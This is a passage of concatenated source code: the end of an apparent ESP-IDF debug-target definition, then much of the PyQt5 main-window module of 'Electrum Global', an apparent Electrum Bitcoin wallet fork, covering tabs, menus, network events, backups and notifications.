'help':
('The port on which gdbgui will be hosted. Default: 5000\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbtui': {
'callback': gdbtui,
'help': 'GDB TUI mode.',
'options': [gdbinit, fail_if_openocd_failed],
'order_dependencies': ['all', 'flash'],
},
'post-debug': {
'callback': post_debug,
                'help': 'Utility target to read the output of async debug actions and stop them.',
'options': [
{
                        'names': ['--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
'post_debug': {
'callback': post_debug,
'deprecated': {
'removed': 'v5.0',
'message': 'Please use "post-debug" instead.',
},
'hidden': True,
                'help': 'Utility target to read the output of async debug actions and stop them.',
'options': [
{
                        'names': ['--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
},
}
return debug_actions
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
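        # Schedule `coro` on the network's asyncio event loop from the wallet's TaskThread;
        # `on_result` (if given) receives the result, and exceptions are reported to the
        # user via show_error_signal.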
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
        t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether we want to announce something, since the callback may already have fired before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Global Testnet" if constants.net.TESTNET else "Electrum Global"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin Global network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://bitcoin-global.io"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitglobal:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum Global",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum Global", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum Global", message, QSystemTrayIcon.Information, 20000)
# Custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
